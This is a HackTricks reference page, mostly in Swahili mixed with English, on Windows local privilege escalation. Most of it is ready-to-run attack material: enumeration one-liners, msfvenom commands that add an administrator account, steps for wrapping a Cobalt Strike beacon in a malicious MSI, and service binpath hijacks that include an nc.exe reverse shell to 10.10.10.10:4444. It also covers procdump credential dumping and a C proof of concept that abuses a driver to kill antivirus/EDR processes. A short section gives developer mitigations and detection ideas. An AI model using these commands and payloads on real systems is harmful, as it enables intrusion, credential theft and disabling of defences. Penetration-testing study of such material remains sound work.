Windows Local Privilege Escalation

Reading time: 59 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Best tool to look for Windows local privilege escalation vectors: WinPEAS

Nadharia ya Msingi ya Windows

Access Tokens

Kama haujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Angalia ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

Kama haujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:

Integrity Levels

Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza prevent you from enumerating the system, kukuzuia kuendesha executables au hata detect your activities. Unapaswa read ukurasa ufuatao na enumerate mifumo yote ya defenses mechanisms hizi kabla ya kuanza the privilege escalation enumeration:

Windows Security Controls

System Info

Version info enumeration

Angalia kama Windows version ina udhaifu unaojulikana (pia angalia patches zilizowekwa).

bash

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

bash

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

Tovuti hii site inafaa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya udhaifu 4,700 za usalama, ikionyesha massive attack surface ambayo mazingira ya Windows yanayo.

Kwenye mfumo

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
watson
winpeas (Winpeas imejumuisha watson)

Kwenye mashine kwa taarifa za mfumo

Github repos of exploits:

Mazingira

Je, kuna credential/Juicy info zilizohifadhiwa kwenye env variables?

bash

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

Historia ya PowerShell

bash

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Faili za transcript za PowerShell

Unaweza kujifunza jinsi ya kuamilisha hii katika https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

bash

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa pipeline ya PowerShell yanarekodiwa, yakijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji pamoja na matokeo ya output huenda yasichukuliwe.

Ili kuwezesha hili, fuata maagizo katika sehemu ya "Transcript files" ya nyaraka, ukichagua "Module Logging" badala ya "Powershell Transcription".

bash

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuangalia matukio 15 ya mwisho kutoka kwenye PowersShell logs unaweza kutekeleza:

bash

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na maudhui yote ya utekelezaji wa script inarekodiwa, ikihakikisha kuwa kila block of code inarekodiwa inapoendeshwa. Mchakato huu unahifadhi audit trail kamili ya kila shughuli, muhimu kwa forensics na uchambuzi wa malicious behavior. Kwa kurekodi shughuli zote wakati wa utekelezaji, hupatikana ufahamu wa kina kuhusu mchakato.

bash

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio ya log za Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

bash

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Intaneti

bash

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Diski

bash

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza kudhoofisha mfumo ikiwa masasisho hayaombwi kwa kutumia httpS bali http.

Unaanza kwa kuangalia ikiwa mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ikiwa utapokea jibu kama moja ya hizi:

bash

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

bash

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equals to 1.

Basi, inaweza kutumiwa. Ikiwa rejista ya mwisho ni 0, basi rekodi ya WSUS itafutwa.

Ili kutekeleza udhaifu huu unaweza kutumia zana kama: Wsuxploit, pyWSUS - Hizi ni scripts za exploits za MiTM zilizotengenezwa kwa kuingiza masasisho 'bandia' kwenye trafiki ya WSUS isiyo ya SSL.

Read the research here:

WSUS CVE-2020-1013

Read the complete report here.
Kwa msingi, hii ndiyo dosari ambayo mdudu huyu unatumia:

Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wa ndani, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha PyWSUS kwa eneo la ndani kukamata trafiki yetu na kuendesha msimbo kama mtumiaji mwenye ruhusa iliyoongezeka kwenye kifaa chetu.

Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia certificate store yake. Ikiwa tutaunda cheti kilichojiandikia wenyewe kwa hostname ya WSUS na kuongeza cheti hicho katika certificate store ya mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS kwa HTTP na HTTPS. WSUS haitumii mbinu za aina ya HSTS-like kutekeleza uthibitisho wa trust-on-first-use kwa cheti. Ikiwa cheti kinachowasilishwa kinathaminiwa na mtumiaji na kina hostname sahihi, kitakubaliwa na huduma.

Unaweza kutekeleza udhaifu huu kwa kutumia zana WSUSpicious (mara itakapotolewa).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Wakala wengi wa mitaa ya kampuni huonyesha uso wa localhost IPC na chaneli ya masasisho yenye heshima. Ikiwa usajili unaweza kulazimishwa kwa seva ya mshambuliaji na updater inaamini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kuwasilisha MSI ya kuharibu ambayo huduma ya SYSTEM itaisakinisha. Angalia mbinu ya jumla (iliyotegemea mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa:

Abusing Auto Updaters And Ipc

KrbRelayUp

Kuna udhaifu wa local privilege escalation katika mazingira ya domain ya Windows chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo LDAP signing haitekelezewi, watumiaji wana haki za kujitegemea zinazowaruhusu kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kuwa mahitaji haya yanapatikana kwa kutumia mipangilio ya default.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

Ikiwa rejista hizi 2 zimewezeshwa (thamani ni 0x1), basi watumiaji wa kiwango chochote cha ruhusa wanaweza kusakinisha (kuendesha) *.msi files kama NT AUTHORITY\SYSTEM.

bash

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

bash

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Ikiwa una kikao cha meterpreter unaweza kuendesha mbinu hii moja kwa moja kwa kutumia module exploit/windows/local/always_install_elevated

PowerUP

Tumia amri Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa binari ya Windows MSI ili kupandisha ruhusa. Script hii inaandika msanidi wa MSI uliotayarishwa awali ambao utauliza kuongeza mtumiaji/kikundi (kwa hivyo utahitaji upatikanaji wa GIU):

Write-UserAddMSI

Just execute the created binary to escalate privileges.

MSI Wrapper

Soma tutorial hii kujifunza jinsi ya kuunda MSI wrapper ukitumia tools hizi. Kumbuka unaweza ku-wrap faili ".bat" ikiwa unataka just execute command lines

MSI Wrapper

Create MSI with WIX

Create MSI with Visual Studio

Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
Fungua Visual Studio, chagua Create a new project na andika "installer" kwenye boksi la utafutaji. Chagua project ya Setup Wizard na bonyeza Next.
Toa jina kwa project, kama AlwaysPrivesc, tumia C:\privesc kama location, chagua place solution and project in the same directory, na bonyeza Create.
Endelea kubonyeza Next hadi ufike hatua ya 3 ya 4 (chagua files za kujumuisha). Bonyeza Add na chagua payload ya Beacon uliyotengeneza. Kisha bonyeza Finish.
Chagua project ya AlwaysPrivesc ndani ya Solution Explorer na kwenye Properties, badilisha TargetPlatform kutoka x86 kwenda x64.
Kuna properties nyingine unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya app iliyosakinishwa ionekane halali zaidi.
Bonyeza kulia project na chagua View > Custom Actions.
Bonyeza kulia Install na chagua Add Custom Action.
Bonyeza mara mbili kwenye Application Folder, chagua faili yako ya beacon.exe na bonyeza OK. Hii itahakikisha kuwa beacon payload inatekelezwa mara tu installer inapofanyika.
Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
Mwishowe, build it.
Ikiwa onyo File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' linaonekana, hakikisha umeweka platform kuwa x64.

MSI Installation

Ili execute the installation ya malicious .msi file kwa background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili kutumia udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus na Wagunduzi

Mipangilio ya Ukaguzi

Mipangilio hii huamua nini kinarekodiwa, kwa hivyo unapaswa kuzingatia

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, ni muhimu kujua logs zinatumwa wapi

bash

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imeundwa kwa ajili ya management of local Administrator passwords, ikihakikisha kwamba kila password ni unique, randomised, and regularly updated kwenye kompyuta zinazounganishwa kwenye domain. Password hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona local admin passwords ikiwa wameidhinishwa.

LAPS

WDigest

Ikiwa inatumika, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.

bash

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Kuanzia Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyoaminika la kusoma kumbukumbu yake au kuingiza msimbo, na hivyo kuimarisha usalama wa mfumo.
Taarifa zaidi kuhusu LSA Protection hapa.

bash

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ililetwa katika Windows 10. Lengo lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama vile pass-the-hash attacks.| More info about Credentials Guard here.

bash

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials huidhinishwa na Local Security Authority (LSA) na hutumiwa na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zikiidhinishwa na kifurushi cha usalama kilichosajiliwa, domain credentials za mtumiaji kwa kawaida huanzishwa.
More info about Cached Credentials here.

bash

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji & Makundi

Orodhesha Watumiaji & Makundi

Unapaswa kuangalia ikiwa yoyote ya makundi unayoyamo ina ruhusa zinazovutia.

bash

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Vikundi vyenye mamlaka maalum

Ikiwa wewe ni mwanachama wa kikundi chenye mamlaka, unaweza kuweza kuongeza mamlaka. Jifunze kuhusu vikundi vyenye mamlaka na jinsi ya kuvitumia vibaya ili kuongeza mamlaka hapa:

Privileged Groups

Token manipulation

Jifunze zaidi kuhusu ni nini token katika ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili ujifunze kuhusu tokens zenye kuvutia na jinsi ya kuvitumia vibaya:

Abusing Tokens

Watumiaji walioingia / Vikao

bash

qwinsta
klist sessions

Folda za nyumbani

bash

dir C:\Users
Get-ChildItem C:\Users

Sera ya nywila

bash

net accounts

Pata yaliyomo kwenye clipboard

bash

powershell -command "Get-Clipboard"

Michakato Zinazokimbia

Ruhusa za Faili na Folda

Kwanza kabisa, kwa kuorodhesha michakato angalia passwords ndani ya command line ya mchakato.
Angalia kama unaweza overwrite some binary running au kama una write permissions kwenye binary folder ili ku-exploit possible DLL Hijacking attacks:

bash

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia uwezekano wa electron/cef/chromium debuggers running, you could abuse it to escalate privileges.

Kuangalia ruhusa za binaries za michakato

bash

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kukagua ruhusa za folda za binaries za michakato (DLL Hijacking)

bash

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

Unaweza kuunda memory dump ya mchakato unaoendesha kwa kutumia procdump kutoka kwa sysinternals. Huduma kama FTP zina credentials in clear text in memory; jaribu ku-dump memory na kusoma credentials.

bash

procdump.exe -accepteula -ma <proc_name_tasklist>

Programu za GUI zisizo salama

Programu zinazoendesha kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.

Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt"

Services

Service Triggers zinaruhusu Windows kuanzisha service wakati vigezo fulani vinapotokea (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, n.k.). Hata bila haki za SERVICE_START, mara nyingi unaweza kuanzisha huduma zenye hadhi kwa kuwasha triggers zao. Angalia mbinu za enumeration na activation hapa:

Service Triggers

Pata orodha ya services:

bash

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za huduma.

bash

sc qc <service_name>

Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kuangalia kiwango kinachohitajika cha ruhusa kwa kila huduma.

bash

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inashauriwa kukagua ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote:

bash

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

Unaweza kupakua accesschk.exe kwa XP hapa

Washa huduma

Ikiwa unapata hitilafu hii (kwa mfano na SSDPSRV):

System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Unaweza kuiwasha kwa kutumia

bash

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)

Njia mbadala nyingine ya tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Badilisha njia ya binary ya huduma

Katika senario ambapo kikundi cha "Authenticated users" kinamiliki SERVICE_ALL_ACCESS kwenye huduma, inawezekana kubadilisha binary inayotekelezwa ya huduma. Ili kubadilisha na kuendesha sc:

bash

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya huduma

bash

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Haki za ufikiaji zinaweza kupandishwa kupitia ruhusa mbalimbali:

SERVICE_CHANGE_CONFIG: Inaruhusu kusanidi upya service binary.
WRITE_DAC: Inawezesha upya usanidi wa ruhusa, na hivyo kupelekea uwezo wa kubadilisha service configurations.
WRITE_OWNER: Inaruhusu upokeaji wa umiliki na upya usanidi wa ruhusa.
GENERIC_WRITE: Inarithi uwezo wa kubadilisha service configurations.
GENERIC_ALL: Pia inarithi uwezo wa kubadilisha service configurations.

Kwa utambuzi na exploitation ya udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.

Ruhusa dhaifu za service binaries

Angalia ikiwa unaweza kubadilisha binary inayotekelezwa na service au ikiwa una write permissions kwenye folder ambako binary iko (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service kwa kutumia wmic (sio katika system32) na ukague permissions zako kwa kutumia icacls:

bash

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

bash

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Ruhusa za kubadilisha rejista ya huduma

Unapaswa kuangalia kama unaweza kubadilisha rejista yoyote ya huduma.
Unaweza kuangalia uruhusa zako juu ya rejista ya huduma kwa kufanya:

bash

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kukaguliwa ikiwa Authenticated Users au NT AUTHORITY\INTERACTIVE wana ruhusa za FullControl. Ikiwa ndivyo, binary inayotekelezwa na service inaweza kubadilishwa.

Ili kubadilisha Path ya binary inayotekelezwa:

bash

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory permissions

Ikiwa una ruhusa hii juu ya registry hii inamaanisha unaweza kuunda sub registries kutoka kwa hii. Katika kesi ya Windows services hili ni enough to execute arbitrary code:

AppendData/AddSubdirectory permission over service registry

Unquoted Service Paths

Ikiwa path ya executable haiko ndani ya quotes, Windows itajaribu kutekeleza kila sehemu kabla ya space.

For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:

bash

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za unquoted service paths, ukiondoa zile zinazomilikiwa na built-in Windows services:

bash

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

bash

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

bash

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na exploit udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda kwa mkono service binary kwa metasploit:

bash

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Hatua za Urejesho

Windows inaruhusu watumiaji kuteua vitendo vitakavyofanyika ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Kama binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana katika nyaraka rasmi.

Programu

Programu Zilizowekwa

Kagua ruhusa za binaries (labda unaweza kuibadilisha moja na privilege escalation) na za folda (DLL Hijacking).

bash

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Ruhusa za Kuandika

Angalia kama unaweza kubadilisha baadhi ya faili za config ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks).

Njia ya kutafuta ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya:

bash

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

bash

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

bash

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Endeshwa wakati wa kuanza

Angalia ikiwa unaweza kuandika juu ya registry au binary itakayotekelezwa na mtumiaji mwingine.
Soma ukurasa ufuatao ili ujifunze zaidi kuhusu maeneo yanayovutia ya autoruns locations to escalate privileges:

Privilege Escalation with Autoruns

Madereva

Tafuta madereva ya wadau wa tatu ambayo yanaweza kuwa isiyo ya kawaida/dhaifu

bash

driverquery
driverquery.exe /fo table
driverquery /SI

Ikiwa driver inatoa primitive ya kusoma/kuandika ya kernel kwa hiari (common in poorly designed IOCTL handlers), unaweza kupandisha hadhi kwa kuiba SYSTEM token moja kwa moja kutoka kwenye kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa:

Arbitrary Kernel Rw Token Theft

Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)

Baadhi ya drivers zilizosainiwa za pande tatu huunda device object zao na SDDL thabiti kupitia IoCreateDeviceSecure lakini hukosa kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila bendera hii, secure DACL haitekelezwi wakati device inafunguliwa kupitia path inayojumuisha sehemu ya ziada, ikiruhusu mtumiaji asiye na ruhusa kupata handle kwa kutumia namespace path kama:

\.\DeviceName\anything
\.\amsdk\anyfile (from a real-world case)

Mara mtumiaji anapoweza kufungua device, IOCTLs zenye ruhusa zinazotolewa na driver zinaweza kutumika kwa LPE na tampering. Mifano ya uwezo uliobonyezwa kwa vitendo:

Kurudisha full-access handles kwa arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
Kumaliza arbitrary processes, ikijumuisha Protected Process/Light (PP/PPL), ikiruhusu AV/EDR kill kutoka user land kupitia kernel.

Mfano mdogo wa PoC (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Kupunguza hatari kwa watengenezaji

Daima weka FILE_DEVICE_SECURE_OPEN wakati wa kuunda device objects zinazokusudiwa kufungiwa na DACL.
Thibitisha muktadha wa mwito kabla ya operesheni zenye ruhusa za juu. Ongeza PP/PPL checks kabla ya kuruhusu process termination au handle returns.
Punguza IOCTLs (access masks, METHOD_*, input validation) na fikiria brokered models badala ya direct kernel privileges.

Mawazo ya utambuzi kwa walinzi

Chunguza user-mode opens za suspicious device names (e.g., \ .\amsdk*) na mfululizo maalum wa IOCTL unaoashiria matumizi mabaya.
Tekeleza Microsoft’s vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na udumishe orodha zako za allow/deny.

PATH DLL Hijacking

